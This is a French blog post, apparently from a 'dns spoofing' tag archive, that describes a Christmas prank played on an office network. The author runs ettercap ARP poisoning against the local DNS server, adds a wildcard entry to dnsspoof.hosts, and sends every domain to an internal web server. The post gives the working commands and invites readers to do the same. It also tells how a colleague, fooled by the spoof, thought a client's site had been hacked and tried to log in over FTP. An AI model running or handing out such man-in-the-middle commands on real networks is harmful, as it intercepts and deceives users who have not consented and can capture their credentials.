Archives par mot-clé : dns spoofing

Souhaiter de joyeuses fêtes en piratant ses DNS ^^.

Bonsoir ^^.

L’idée est farfelue, mais avec un collègue du bureau, on n’a pas pus s’empêcher de rediriger tous les domaines d’internet (en local bien entendu ;)) sur une adresses IP en interne avec un petit serveur web qui affichait une sympatique page web souhaitant un joyeux noël !!

Si vous aussi vous souhaitez rigoler un peu avant de partir en week-end ou bien juste souhaiter de bonnes fêtes de façon amusante, il vous faut deux logiciels : ettercap et dnsspoof (ou bien backtrack3) et un peu de courage ;).

ensuite, lancez ettercap de la façon suivante :

ettercap -Tq -i interface -M arp:remote // /ip du serveur dns local/

genre :

ettercap -Tq -i eth0 -M arp:remote // /192.168.0.1/

ensuite, il faut modifier le fichier dnsspoof.hosts de dnsspoof (si vous utilisez backtrack3 le fichier ce trouve ici : /usr/local/lib/dnsspoof.hosts).

et ajouter la ligne :

ip du serveur web local    *

genre :

192.168.0.2    *

qui aura pour effet de rediriger tous les domaines (genre google.fr, korben.info, …) sur l’ip local 192.168.0.2

et donc on lance dnsspoof :

dnsspoof -i interface -f /usr/local/lib/dnsspoof.hosts

Bien entendu, ce n’est pas à faire très souvent, et pour mon cas, l’effet désiré n’a pas été celui qui c’est produit … un chef de projet a même cru que le site d’un client c’était fait pirater … il essayait même de ce connecter en ftp pour tenter de corriger le problème (comme tous les domaines étaient redirigés en local … le domaine du ftp aussi ^^ imaginez la suite :p).

N’oubliez pas de mettre en place le serveur HTTP … 😉

Enjoy 😉